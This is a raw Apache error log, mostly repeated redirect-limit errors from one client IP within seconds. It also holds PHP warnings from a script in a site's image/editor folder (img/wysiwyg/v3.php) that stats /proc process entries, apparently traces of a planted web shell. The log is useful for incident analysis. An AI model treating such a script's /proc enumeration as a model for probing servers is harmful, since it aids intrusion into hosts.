[Mon May 11 16:27:34.504565 2026] [core:error] [pid 1416109:tid 1416149] [client 18.180.54.2:37582] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:34.537856 2026] [core:error] [pid 1412074:tid 1412089] [client 18.180.54.2:37576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:34.537880 2026] [core:error] [pid 1412074:tid 1412089] [client 18.180.54.2:37576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:35.223247 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:37590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:35.223282 2026] [core:error] [pid 1411099:tid 1411116] [client 18.180.54.2:37590] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:35.273594 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:37598] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:35.273626 2026] [core:error] [pid 1411201:tid 1411262] [client 18.180.54.2:37598] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:35.936517 2026] [core:error] [pid 1411201:tid 1411254] [client 18.180.54.2:37604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:35.936549 2026] [core:error] [pid 1411201:tid 1411254] [client 18.180.54.2:37604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:36.008827 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:37608] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:36.008861 2026] [core:error] [pid 1416109:tid 1416132] [client 18.180.54.2:37608] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:36.664757 2026] [core:error] [pid 1416109:tid 1416136] [client 18.180.54.2:37618] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:36.664792 2026] [core:error] [pid 1416109:tid 1416136] [client 18.180.54.2:37618] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:36.688112 2026] [core:error] [pid 1412074:tid 1412091] [client 18.180.54.2:37628] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:36.688134 2026] [core:error] [pid 1412074:tid 1412091] [client 18.180.54.2:37628] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:37.369832 2026] [core:error] [pid 1411201:tid 1411265] [client 18.180.54.2:37648] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:37.369859 2026] [core:error] [pid 1411201:tid 1411265] [client 18.180.54.2:37648] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:37.409979 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:37638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:37.410010 2026] [core:error] [pid 1416109:tid 1416137] [client 18.180.54.2:37638] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.091064 2026] [core:error] [pid 1411201:tid 1411246] [client 18.180.54.2:37658] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.091091 2026] [core:error] [pid 1411201:tid 1411246] [client 18.180.54.2:37658] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.112137 2026] [core:error] [pid 1416109:tid 1416150] [client 18.180.54.2:37674] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.112179 2026] [core:error] [pid 1416109:tid 1416150] [client 18.180.54.2:37674] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.830040 2026] [core:error] [pid 1412074:tid 1412098] [client 18.180.54.2:48736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.830069 2026] [core:error] [pid 1412074:tid 1412098] [client 18.180.54.2:48736] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.831131 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:48752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:38.831172 2026] [core:error] [pid 1411055:tid 1411058] [client 18.180.54.2:48752] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:39.532013 2026] [core:error] [pid 1412074:tid 1412079] [client 18.180.54.2:48758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:39.532040 2026] [core:error] [pid 1412074:tid 1412079] [client 18.180.54.2:48758] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:39.559378 2026] [core:error] [pid 1411055:tid 1411070] [client 18.180.54.2:48754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:39.559411 2026] [core:error] [pid 1411055:tid 1411070] [client 18.180.54.2:48754] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.255452 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:48768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.255488 2026] [core:error] [pid 1416109:tid 1416129] [client 18.180.54.2:48768] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.256633 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:48766] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.256665 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:48766] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.974359 2026] [core:error] [pid 1411099:tid 1411106] [client 18.180.54.2:48784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.974394 2026] [core:error] [pid 1411099:tid 1411106] [client 18.180.54.2:48784] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.998210 2026] [core:error] [pid 1411201:tid 1411249] [client 18.180.54.2:48786] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:40.998239 2026] [core:error] [pid 1411201:tid 1411249] [client 18.180.54.2:48786] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:41.718570 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:48798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:41.718596 2026] [core:error] [pid 1411055:tid 1411059] [client 18.180.54.2:48798] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:41.743544 2026] [core:error] [pid 1411099:tid 1411111] [client 18.180.54.2:48808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:41.743576 2026] [core:error] [pid 1411099:tid 1411111] [client 18.180.54.2:48808] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:42.424497 2026] [core:error] [pid 1411055:tid 1411063] [client 18.180.54.2:48816] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:42.424527 2026] [core:error] [pid 1411055:tid 1411063] [client 18.180.54.2:48816] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:42.447356 2026] [core:error] [pid 1411099:tid 1411107] [client 18.180.54.2:48818] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:42.447390 2026] [core:error] [pid 1411099:tid 1411107] [client 18.180.54.2:48818] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.140038 2026] [core:error] [pid 1411055:tid 1411073] [client 18.180.54.2:48820] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.140068 2026] [core:error] [pid 1411055:tid 1411073] [client 18.180.54.2:48820] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.169571 2026] [core:error] [pid 1411099:tid 1411292] [client 18.180.54.2:48830] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.169601 2026] [core:error] [pid 1411099:tid 1411292] [client 18.180.54.2:48830] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.867854 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:48846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.867882 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:48846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.874880 2026] [core:error] [pid 1411099:tid 1411122] [client 18.180.54.2:48842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:43.874901 2026] [core:error] [pid 1411099:tid 1411122] [client 18.180.54.2:48842] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:44.549828 2026] [core:error] [pid 1411099:tid 1411123] [client 18.180.54.2:48850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:44.549853 2026] [core:error] [pid 1411099:tid 1411123] [client 18.180.54.2:48850] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:44.613591 2026] [core:error] [pid 1411201:tid 1411268] [client 18.180.54.2:48858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:44.613628 2026] [core:error] [pid 1411201:tid 1411268] [client 18.180.54.2:48858] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:45.233237 2026] [core:error] [pid 1411099:tid 1411101] [client 18.180.54.2:48860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:45.233273 2026] [core:error] [pid 1411099:tid 1411101] [client 18.180.54.2:48860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:45.317840 2026] [core:error] [pid 1411201:tid 1411264] [client 18.180.54.2:48872] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:45.317870 2026] [core:error] [pid 1411201:tid 1411264] [client 18.180.54.2:48872] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:45.951769 2026] [core:error] [pid 1416109:tid 1416147] [client 18.180.54.2:48882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:45.951794 2026] [core:error] [pid 1416109:tid 1416147] [client 18.180.54.2:48882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:46.040932 2026] [core:error] [pid 1412074:tid 1412084] [client 18.180.54.2:48894] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:46.040968 2026] [core:error] [pid 1412074:tid 1412084] [client 18.180.54.2:48894] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:46.693958 2026] [core:error] [pid 1411099:tid 1411112] [client 18.180.54.2:48900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:46.694000 2026] [core:error] [pid 1411099:tid 1411112] [client 18.180.54.2:48900] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:46.776938 2026] [core:error] [pid 1411201:tid 1411248] [client 18.180.54.2:48904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:46.776958 2026] [core:error] [pid 1411201:tid 1411248] [client 18.180.54.2:48904] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:47.428471 2026] [core:error] [pid 1411055:tid 1411078] [client 18.180.54.2:48918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:47.428503 2026] [core:error] [pid 1411055:tid 1411078] [client 18.180.54.2:48918] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:47.477040 2026] [core:error] [pid 1411201:tid 1411257] [client 18.180.54.2:48934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:47.477067 2026] [core:error] [pid 1411201:tid 1411257] [client 18.180.54.2:48934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:48.124746 2026] [core:error] [pid 1411055:tid 1411080] [client 18.180.54.2:48938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:48.124782 2026] [core:error] [pid 1411055:tid 1411080] [client 18.180.54.2:48938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:48.194399 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:48940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:48.194432 2026] [core:error] [pid 1411099:tid 1411120] [client 18.180.54.2:48940] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790188/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790188/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790188/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790188/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1790188/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1790188/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 16:27:48.846926 2026] [core:error] [pid 1411055:tid 1411062] [client 18.180.54.2:53862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:48.846955 2026] [core:error] [pid 1411055:tid 1411062] [client 18.180.54.2:53862] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:48.895656 2026] [core:error] [pid 1411099:tid 1411118] [client 18.180.54.2:53876] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:48.895687 2026] [core:error] [pid 1411099:tid 1411118] [client 18.180.54.2:53876] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:49.578300 2026] [core:error] [pid 1411201:tid 1411247] [client 18.180.54.2:53892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:49.578361 2026] [core:error] [pid 1411201:tid 1411247] [client 18.180.54.2:53892] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:49.590801 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:53882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:49.590825 2026] [core:error] [pid 1411099:tid 1411119] [client 18.180.54.2:53882] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:50.261883 2026] [core:error] [pid 1411055:tid 1411065] [client 18.180.54.2:53896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:50.261925 2026] [core:error] [pid 1411055:tid 1411065] [client 18.180.54.2:53896] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:50.330017 2026] [core:error] [pid 1411099:tid 1411113] [client 18.180.54.2:53902] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:50.330048 2026] [core:error] [pid 1411099:tid 1411113] [client 18.180.54.2:53902] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:50.941892 2026] [core:error] [pid 1412074:tid 1412093] [client 18.180.54.2:53914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:50.941931 2026] [core:error] [pid 1412074:tid 1412093] [client 18.180.54.2:53914] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:51.071169 2026] [core:error] [pid 1411055:tid 1411079] [client 18.180.54.2:53926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:51.071205 2026] [core:error] [pid 1411055:tid 1411079] [client 18.180.54.2:53926] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:51.624008 2026] [core:error] [pid 1416109:tid 1416141] [client 18.180.54.2:53934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:51.624043 2026] [core:error] [pid 1416109:tid 1416141] [client 18.180.54.2:53934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:51.813650 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:53948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:51.813683 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:53948] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:52.306061 2026] [core:error] [pid 1411099:tid 1411114] [client 18.180.54.2:53952] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:52.306095 2026] [core:error] [pid 1411099:tid 1411114] [client 18.180.54.2:53952] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:52.559439 2026] [core:error] [pid 1411201:tid 1411258] [client 18.180.54.2:53968] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:52.559470 2026] [core:error] [pid 1411201:tid 1411258] [client 18.180.54.2:53968] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:53.020067 2026] [core:error] [pid 1412074:tid 1412098] [client 18.180.54.2:53984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:53.020097 2026] [core:error] [pid 1412074:tid 1412098] [client 18.180.54.2:53984] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:53.265347 2026] [core:error] [pid 1411055:tid 1411068] [client 18.180.54.2:53988] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:53.265377 2026] [core:error] [pid 1411055:tid 1411068] [client 18.180.54.2:53988] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:53.992256 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:54014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:27:53.992286 2026] [core:error] [pid 1411201:tid 1411261] [client 18.180.54.2:54014] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
